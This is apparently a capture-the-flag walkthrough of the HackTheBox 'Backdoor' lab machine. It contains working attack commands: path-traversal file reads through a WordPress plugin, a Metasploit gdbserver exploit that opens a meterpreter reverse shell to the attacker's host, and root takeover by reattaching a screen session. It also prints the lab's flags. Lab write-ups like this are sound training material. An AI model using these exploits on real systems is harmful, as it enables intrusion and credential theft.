Name | Backdoor |
---|---|
OS | Linux |
Difficulty | Easy |
Base Points | 20 |
Release Date | 20 November 2021 |
IP | 10.10.11.125 |
Starting with NMap Scan.
sudo nmap -A 10.10.11.125
Results:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-24 20:57 IST Nmap scan report for 10.10.11.125 Host is up (0.25s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA) | 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA) |_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 5.8.1 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Backdoor – Real-Life No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=11/24%OT=22%CT=1%CU=34304%PV=Y%DS=2%DC=T%G=Y%TM=619E5A OS:35%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)SEQ(SP= OS:108%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7% OS:O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2 OS:=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNS OS:NW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y% OS:DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR% OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40% OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G% OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 143/tcp) HOP RTT ADDRESS 1 211.19 ms 10.10.14.1 2 211.48 ms 10.10.11.125 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 87.62 seconds
Here I got a web server running at port 80 which is powered by Wordpress.
So, I started the recon using the tool wpscan.
kali@kali:~/HackTheBox/Backdoor$ wpscan --url http://10.10.11.125/ . . . [+] Upload directory has listing enable: http://10.10.11.125/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
As per WPScan I can access the uploads folder. Let's try to brute force our way to the admin panel at /wp-admin
I also ran gobuster and found the following:
kali@kali:~$ gobuster dir -u http://10.10.11.125/ -w /usr/share/wordlists/dirb/common.txt ====================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) ====================================== [+] Url: http://10.10.11.125/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s ====================================== 2021/11/24 21:51:30 Starting gobuster in directory enumeration mode ====================================== /.hta (Status: 403) [Size: 279] /.htaccess (Status: 403) [Size: 279] /.htpasswd (Status: 403) [Size: 279] /index.php (Status: 301) [Size: 0] [→ http://10.10.11.125/] /server-status (Status: 403) [Size: 279] /wp-admin (Status: 301) [Size: 319] [→ http://10.10.11.125/wp-admin/] /wp-content (Status: 301) [Size: 321] [→ http://10.10.11.125/wp-content/] /wp-includes (Status: 301) [Size: 322] [→ http://10.10.11.125/wp-includes/] /xmlrpc.php (Status: 405) [Size: 42]
On looking for some exploit here. And I found one on exploit-db here
Exploited the same using the following URL:
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
I got some credentials but none useful. So I ran rustscan to check for any other open ports.
rustscan -a 10.10.11.125 . . . Open 10.10.11.125:22 Open 10.10.11.125:80 Open 10.10.11.125:1337
Using Curl Command on port 1337, I found another wordpress webpage. From the Previous LFI, I found a debug file on /proc/sched_debug.
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/sched_debug
From this file, I found an unusual service named as gdbserver and it's PID to be 986. Let's use LFI to confirm the same that is it the one which is running on Port 1337.
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/986/status
From this, I had a rough guess that this particular server is running on Port 1337 so I started looking for an exploit.
For gdbserver I got a msf module at rapid7
On setting the options and executing the payload, I was able to gain the user shell.
msf6 exploit(multi/gdb/gdb_server_exec) > options Module options (exploit/multi/gdb/gdb_server_exec): Name Current Setting Required Description ---- --------------- -------- ----------- EXE_FILE /bin/true no The exe to spawn when gdbserver is not attached to a process. RHOSTS 10.10.11.125 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 1337 yes The target port (TCP) Payload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.43 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 x86 (32-bit) msf6 exploit(multi/gdb/gdb_server_exec) > run [*] Started reverse TCP handler on 10.10.14.43:4444 [*] 10.10.11.125:1337 - Performing handshake with gdbserver ... [*] 10.10.11.125:1337 - Stepping program to find PC ... [*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103 ... [*] 10.10.11.125:1337 - Executing the payload ... [*] Sending stage (3012548 bytes) to 10.10.11.125 [*] Meterpreter session 1 opened (10.10.14.43:4444 -> 10.10.11.125:51320) at 2021-12-04 17:58:19 +0530 meterpreter> shell Process 15273 created. Channel 1 created. whoami user pwd /home/user ls user.txt cat user.txt 28fd4e11bb119003fbd1e1325abfeb88
I searched for SUID files using the command:
user@Backdoor:/var/www/html$ find / -type f -user root -perm -4000 2>/dev/null . . . /usr/lib/policykit-1/polkit-agent-helper-1 ...
Here I found polkit to be suspicious so I searched for an exploit which is here
But this didn't worked. I started with further enumeration.
Another suspicious thing I found was in the process list.
user@Backdoor:/var/www/html$ ps -aux . . . root 965 0.0 0.1 6952 2368 ? Ss 10:54 0:00 SCREEN -dmS r
So, this is a background command which has a detached screen session with the session name as root.
All I need to do is to reattach it.
Reference Article here
user@Backdoor:$ export TERM=xterm user@Backdoor:$ screen -x root/root root@Backdoor:# whoami whoami root root@Backdoor:# cat /root/root.txt cat /root/root.txt 002b00ba697d87fa81b79b89e531a247